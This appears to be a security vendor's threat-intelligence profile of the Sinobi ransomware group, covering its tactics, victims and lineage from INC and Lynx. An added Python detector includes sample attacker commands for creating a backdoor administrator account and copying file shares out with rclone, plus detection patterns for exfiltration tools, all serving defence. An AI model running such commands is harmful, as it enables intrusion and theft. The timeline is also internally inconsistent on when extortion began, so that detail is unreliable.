Sinobi: The bougie-exclusive ransomware group that wants to be a ninja
The Sinobi ransomware brand emerged in mid-2025 and has quickly distinguished itself through calculated intrusions, disciplined operational security and a professional structure that reveals highly skilled and well-connected operators.
Sinobi is a hybrid ransomware-as-a-service (RaaS) organization. Core members work with well-screened affiliates to maintain centralized control and distributed operational capability. The group’s techniques improve as the group matures. Sinobi operations are notable for quiet intrusions, modular tooling, selective targeting, and a strong emphasis on both stealth and leverage. The group is also known for its extensive, sophisticated use of living-off-the-land (LotL) and living-off-the-land binaries (LOLBins).
Here’s your quick look at this group:
Feature | Description
Threat Type | Hybrid RaaS group using in-house operators and vetted affiliate partners for targeted double-extortion attacks.
Unique Trait | Modular intrusion chain, sophisticated LotL operations resembling nation-state tradecraft.
Targets | Midsize to large organizations across multiple sectors in the United States and allied countries.
Initial Access | Compromised credentials, application and remote access exploits, and third-party supply chain compromise.
Extortion Method | Data exfiltration and encryption.
Leak Site | “Sinobi” – A simple, TOR-based leak site that lists victims, sample stolen data, and a countdown timer. The group operates separate leak and chat sites, and both have clear web mirrors.
Sinobi data leak site, via Ransomware.Live
Name and location
The word Sinobi appears to be a deliberate stylized reference to ‘shinobi,’ an early Japanese term for ninja. Early internal communications on dark web forums showed affiliates using phrases such as “quiet in, quiet out,” reinforcing the belief that the brand identity is meant to project ninja-like stealth and precision.
Despite the Japanese-inspired name, the communications patterns, linguistic quirks and activity windows indicate Russian and Eastern European origins. Sinobi tooling and negotiations are conducted primarily in Russian and English, with no evidence suggesting state affiliation. This is a financially motivated cybercrime group operating within a familiar regional ecosystem. Independent research by Rakesh Krishnan (The Raven File) supports the location of at least one IP address in Russia:
Independent research by RAKESH KRISHNAN places at least one Sinobi server in Russia
Sinobi offers clearweb mirrors of its dark web leak and chat sites, but the majority of its infrastructure remains on TOR-based resources, dark web forums, and encrypted messaging services like Telegram. This makes it difficult to view and capture the IP addresses of command-and-control (C2) servers.
Victimology, operations, and business model
Sinobi doesn’t appear to be aligned with state interests or any other ideology. The group focuses on organizations with very low tolerance for downtime or data leaks. Manufacturing, business services, healthcare, financial services, education, and other sectors have all been victimized by Sinobi. The group rarely targets smaller companies, probably because of the low “return on (attack) investment.”
Summary of Sinobi attack victims by sector, via MOXFIVE
There is no publicly available information on “protected” regions or industries. However, Sinobi overwhelmingly focuses on entities in the United States, with secondary focus on Canada, Australia and allied countries. The group avoids targets that could draw a political or law enforcement response, particularly government agencies, utilities, and entities throughout the Eastern European region.
Sinobi is unlike open RaaS programs that let prospective affiliates sign up or apply. The group relies on a private and vetted network of specialists who are known to the group or are introduced by trusted sources. This approach allows Sinobi to avoid recruiting activities like this:
DragonForce RaaS recruitment post on underground forum, via Specops
Because Sinobi does not recruit like other RaaS groups, there’s no publicly available list of group rules, affiliate requirements, forbidden targets, or other operational details. This reduces the group’s exposure to law enforcement infiltration and limits available open-source intelligence (OSINT).
Researchers believe Sinobi’s core operators maintain the ransomware code and Tor-based infrastructure, conduct negotiations, manage the money laundering and ‘cashing out’ schemes, and enforce the rules of the group. Affiliates conduct the attacks from intrusion through ransomware deployment. This division of responsibilities is based on observed patterns in Sinobi operations, ransom notes, portal structures and negotiation processes. There is no public confirmation of this, and the revenue split between core members and affiliates is unknown.
Attack chain
Like most ransomware threat groups, Sinobi’s attack chain begins with gaining initial access to the victim’s environment. The group has been observed using initial access brokers (IABs), phishing attacks via commodity phishing kits, and exploiting vulnerable VPNs, firewall appliances, or remote access systems such as Citrix or Fortinet. Sinobi will also compromise a third party and follow the supply chain into a victim.
Sinobi operators follow a standard attack chain that shares many of the same patterns observed in RansomHub, ALPHV/BlackCat and other groups since the Conti ransomware leak.
Once inside the system, Sinobi immediately begins a hands-on-keyboard intrusion that makes use of both custom tooling and living-off-the-land (LotL) abuse. Threat actors begin privilege escalation and security evasion activities, including creating new administrator accounts, adjusting permissions, and disabling endpoint security tools. They also begin establishing persistence by configuring legitimate remote access tools.
Sinobi then drops a lightweight reconnaissance script that automates lateral movement and conducts additional security evasion tasks. The script is configured to enumerate domain information, locate file shares, identify privileged accounts, and check for endpoint security solutions that could disrupt the ransomware attack.
Data exfiltration begins once the attacker has completed reconnaissance and configured Rclone, WinSCP, or some other file transfer tool. The data is sent to cloud storage or another offsite location, and the ransomware binary is executed when this is complete.
There’s no single filename used for the ransomware binary, but it’s usually a generic or obfuscated name like “bin.exe.” This file deletes the Recycle Bin, encrypts the files, appends the .SINOBI extension, and drops the ransom note README.txt into every directory with encrypted files. It then changes the desktop wallpaper to an image that displays the text of the ransom note.
Start of Sinobi ransom note, via Ransomware.Live
End of Sinobi ransom note, via Ransomware.Live
The ransom note includes information on the communication process and the URLs of the TOR leak site. It also includes the URLs to the public clear web leak site. You can see the ransom note in its entirety here.
At this point, the Sinobi affiliate hands off to the core group, which takes over and manages communications, data leaks, and the rest of the extortion process.
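The attack chain above gives a defender several observable stages: new local administrator accounts, an exfiltration tool such as Rclone or WinSCP running on a file server, files renamed with the .SINOBI extension, and README.txt dropped into every encrypted directory. The following Python detector, an added example that is not part of the original article or of any vendor tooling, correlates those stages per host over a constructed set of Sysmon-style events. The event shape (fields ts, type, host, user, cmd, path), the hostnames, the sample command lines and the three-directory threshold for a ransom-note "drop loop" are all assumptions made for the example.

```python
"""Per-host stage correlation for the ransomware chain described in the article.

Added example; the telemetry below is constructed, not real logs.
"""
import re
from collections import defaultdict
from ntpath import basename, dirname  # Windows path handling on any host OS

# Constructed sample telemetry: simplified Sysmon-style process-creation ("process")
# and file-creation ("file") events from one hypothetical file server (FS01) plus
# a benign workstation (WS22). Hostnames, users and paths are invented.
SAMPLE_EVENTS = [
    {"ts": "2025-07-01T02:11:03Z", "type": "process", "host": "FS01",
     "user": "CORP\\svc-backup",
     "cmd": "C:\\Windows\\System32\\net.exe user helpdesk2 Summer2025! /add"},
    {"ts": "2025-07-01T02:11:09Z", "type": "process", "host": "FS01",
     "user": "CORP\\svc-backup",
     "cmd": "C:\\Windows\\System32\\net.exe localgroup administrators helpdesk2 /add"},
    {"ts": "2025-07-01T02:20:41Z", "type": "process", "host": "FS01",
     "user": "CORP\\helpdesk2",
     "cmd": "C:\\Temp\\rclone.exe copy D:\\Shares\\Finance remote:drop --transfers 16"},
    {"ts": "2025-07-01T03:05:12Z", "type": "process", "host": "FS01",
     "user": "CORP\\helpdesk2", "cmd": "C:\\Temp\\bin.exe"},
    {"ts": "2025-07-01T03:05:40Z", "type": "file", "host": "FS01",
     "user": "CORP\\helpdesk2", "path": "D:\\Shares\\Finance\\Q2-forecast.xlsx.SINOBI"},
    {"ts": "2025-07-01T03:05:41Z", "type": "file", "host": "FS01",
     "user": "CORP\\helpdesk2", "path": "D:\\Shares\\Finance\\README.txt"},
    {"ts": "2025-07-01T03:05:52Z", "type": "file", "host": "FS01",
     "user": "CORP\\helpdesk2", "path": "D:\\Shares\\HR\\payroll.csv.SINOBI"},
    {"ts": "2025-07-01T03:05:53Z", "type": "file", "host": "FS01",
     "user": "CORP\\helpdesk2", "path": "D:\\Shares\\HR\\README.txt"},
    {"ts": "2025-07-01T03:06:10Z", "type": "file", "host": "FS01",
     "user": "CORP\\helpdesk2", "path": "D:\\Shares\\Legal\\README.txt"},
    # Benign noise: a single README.txt saved by a user on another host.
    {"ts": "2025-07-01T09:30:00Z", "type": "file", "host": "WS22",
     "user": "CORP\\alice", "path": "C:\\Users\\alice\\project\\README.txt"},
]

# Stage predicates, one per observable step of the chain.
ACCOUNT_ADD = re.compile(r"\bnet1?\.exe\s+user\s+\S+\s+\S+\s+/add\b", re.I)
ADMIN_GROUP_ADD = re.compile(r"\bnet1?\.exe\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)
EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}  # transfer tools named in the article
RANSOM_EXT = ".sinobi"                       # extension appended to encrypted files
NOTE_NAME = "readme.txt"                     # ransom note filename
NOTE_DIR_THRESHOLD = 3  # assumed: notes in this many directories = drop loop, not a user


def classify(event):
    """Return the chain stage a single event matches, or None."""
    if event["type"] == "process":
        cmd = event["cmd"]
        if ACCOUNT_ADD.search(cmd):
            return "account_creation"
        if ADMIN_GROUP_ADD.search(cmd):
            return "admin_group_add"
        image = basename(cmd.split(" ", 1)[0]).lower()
        if image in EXFIL_TOOLS:
            return "exfil_tool"
        return None
    if event["type"] == "file":
        path = event["path"]
        if path.lower().endswith(RANSOM_EXT):
            return "encryption_extension"
        if basename(path).lower() == NOTE_NAME:
            return "ransom_note"
    return None


def assess(events):
    """Correlate stages per host in time order.

    Returns {host: {"stages": [...], "note_dirs": int, "verdict": str}}.
    A lone README.txt never fires; the note stage needs NOTE_DIR_THRESHOLD directories.
    """
    per_host = defaultdict(lambda: {"stages": [], "note_dirs": set()})
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage is None:
            continue
        rec = per_host[ev["host"]]
        if stage == "ransom_note":
            rec["note_dirs"].add(dirname(ev["path"]).lower())
            if (len(rec["note_dirs"]) >= NOTE_DIR_THRESHOLD
                    and "ransom_note_spread" not in rec["stages"]):
                rec["stages"].append("ransom_note_spread")
        elif stage not in rec["stages"]:
            rec["stages"].append(stage)

    result = {}
    for host, rec in per_host.items():
        stages = rec["stages"]
        if "encryption_extension" in stages or "ransom_note_spread" in stages:
            verdict = "impact: encryption in progress"
        elif "exfil_tool" in stages:
            verdict = "pre-encryption: exfiltration tooling seen"
        elif stages:
            verdict = "early: privilege changes only"
        else:
            verdict = "no chain indicators"
        result[host] = {"stages": stages, "note_dirs": len(rec["note_dirs"]), "verdict": verdict}
    return result


if __name__ == "__main__":
    for host, rec in assess(SAMPLE_EVENTS).items():
        print(host, "->", rec["verdict"], rec["stages"])
```

The verdict ladder matters more than any single rule: the account creation and Rclone execution occur before the binary runs, so an alert on the "pre-encryption" verdict is the point at which isolating the host can still prevent the encryption stage, whereas the .SINOBI and README.txt signals only confirm impact already under way.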
Extortion and negotiation
Sinobi began as a single-extortion operation, but by late 2024 shifted to a full double-extortion approach using a Tor-hosted leak site. Victims are typically contacted through the ransom note mentioned above. If victims fail to engage, Sinobi escalates by posting data samples and contacting employees or customers. The group will also threaten the company with regulatory exposure under frameworks like GDPR, HIPAA, or SEC disclosure requirements.
Negotiations are handled by a small set of core operators who use templated communication patterns and pressure tactics tailored to the victim’s industry and regulatory posture. The goal is always to drive urgency, not panic—professional manipulation rather than chaos.
Friends and family
Sinobi’s story begins in mid-2023, when a threat actor known as INC ransomware seemingly emerged from nowhere. INC is thought to be an original group with no lineage to other threat actors. It operated as a ransomware-as-a-service group until May 2024, when it was offered for sale on underground forums.
Forum post offering INC ransomware for sale, via SOCRadar
Shortly after the (presumed) sale, the INC leak site design was changed to this style:
INC ransomware link site, via Bleeping Computer
INC activity diminished and a new group called Lynx emerged around the same time. There is no confirmation that Lynx operators purchased INC source code, but Lynx is clearly a successor to INC.
Upon close examination … significant overlap in shared functions strongly suggests that the developers of Lynx ransomware have borrowed and repurposed a considerable portion of the INC codebase to create their own malicious software. Via Unit42
Lynx was an active and aggressive threat for about one year, and then scaled back its activities in mid-2025. The group remains a threat, but its activity declined around the time Sinobi emerged in June 2025.
Sinobi is widely believed to be a rebrand, successor, or offshoot of Lynx ransomware. The Lynx leak site design is just one piece of supporting evidence for this:
Screenshot of Lynx ransomware link site, via Fortinet
You can see the similarities between INC, Lynx, and Sinobi leak sites.
Beyond this, there are similarities in the encryption routine, victimology, double-extortion methodology, and operational procedures.
Sinobi takes full advantage of the threat ecosystem. It routinely purchases access from IABs, rents infrastructure from bulletproof hosting providers, sources credentials from darknet markets, and occasionally partners with botnet operators for phishing distribution. Their laundering and cashing out practices are indistinguishable from those used by Qilin and Akira.
Protect yourself
All indicators suggest that Sinobi is on a growth trajectory. As the ransomware market continues to fragment and evolve, Sinobi is well-positioned to expand its affiliate base, harden its tooling, and potentially add Linux or VMware ESXi-targeting variants. Their quiet professionalism and moderate posting frequency indicate a group that prefers sustainable income over explosive growth, which may help them avoid the fate of high-profile groups that attract aggressive law-enforcement pressure.
Sinobi represents an advanced and agile ransomware threat. Organizations can significantly reduce risk by focusing on credential management, employee awareness, proactive monitoring, and ongoing investments in backup, detection, and response workflows. Prevention and rapid response are currently the most effective means of defending against this threat.
Barracuda can help
Maximize your protection and cyber resilience with the BarracudaONE AI-powered cybersecurity platform. The platform protects your email, data, applications, and networks, and is strengthened by a 24/7 managed XDR service, unifying your security defenses and providing deep, intelligent threat detection and response. Manage your organization’s security posture with confidence, leveraging advanced protection, real-time analytics and proactive response capabilities. Robust reporting tools provide clear, actionable insights, helping you monitor risks, measure ROI and demonstrate operational impact. Don’t miss the opportunity to get a demo of the platform from our cybersecurity experts.